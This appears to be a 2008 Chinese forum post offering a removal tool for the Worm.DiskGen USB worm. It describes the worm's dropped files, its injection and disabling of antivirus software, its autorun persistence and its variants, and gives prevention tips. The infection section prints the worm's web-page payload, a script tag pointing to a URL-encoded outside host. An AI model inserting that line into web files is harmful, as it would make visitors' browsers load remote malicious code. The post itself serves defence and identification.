磁碟机专杀

悠嘻猴

  本款软件由上海山丽信息安全有限公司研发，
请关注：www.sanlen.com

        软件名称：磁碟机专杀
        软件类别：专杀工具
        软件版本：
        软件大小：85.0K
        应用平台：Win2003/WinXP/Win2000/NT/WinME/Win9X/
        更新时间：2008-03-27 18:03:09
        授权方式：免费软件

软件说明


   
病毒评估

        病毒名称： 磁碟机病毒
        病毒名称英文：Worm.DiskGen
        病毒类型：感染型
        危险级别：★★★☆
        传播方式：U盘
        受影响的系统： Windows 2000, Windows XP, Windows Server 2003
        未受影响的系统：Windows 3.x, Macintosh, Unix, Linux
病毒危害：

        1 破坏本机杀毒软件运行，删除本机杀毒软件服务、驱动等。
        2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。
        3 释放DLL文件，注册COM组件，弹出广告，下载其他病毒、木马。
        4 中毒后系统无法进入安全模式、组策略功能也被禁用。
传播形式：

1 病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下：
lsass.exe , smss.exe, netcfg.dll, netcfg.000
释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。

2 启动lsass.exe，smss.exe进程，感染文件。然后加载netcfg.dll，并全局注入dnsq.dll。
3 dnsq.dll文件负责监视杀毒软件及工具的运行，如果发现就将其关闭，关且它还监控病毒进程lsass.exe和smss.exe。
4 该病病毒会感染三种类型的文件：
        1）网页文件：.htm, .html, .js
感染方法：在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>
        2）可执行程序：.exe
被感染的exe文件有三个部分组成：

        a）加了被感染程序图标的病毒体。
        b）被加密的原程序。
        c）加密的病毒体。
        3）压缩文件：.rar, .zip
将压缩包内文件解压，并感染，再打包。
5 在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件，实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件，其中*为一串随机数字。
6 破坏安全模式、删除注册表中“显示隐藏文件属性”键值。
清除病毒

目前SanLen磁碟机病毒专杀共可清除十个磁碟机病毒变种，即：
        Worm.Win32.DiskGen.ca
        Worm.Win32.DiskGen.ci
        Worm.Win32.DiskGen.ex
        Worm.Win32.DiskGen.gfh
        Worm.Win32.DiskGen.u
        Worm.Win32.DiskGen.vin
        Worm.Win32.DiskGen.vio
        Worm.Win32.DiskGen.vip
        Worm.Win32.DiskGen.viq
        Worm.Win32.DiskGen.xx
预防和处理办法:

        1 关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。
        2 及时升级系统漏洞。
        3 将病毒库升级到最新，并开启防病毒软件的实时监控。
磁碟机专杀.rar (81.71 KB, 下载次数: 464)

2008-8-8 13:26 上传

点击文件名下载附件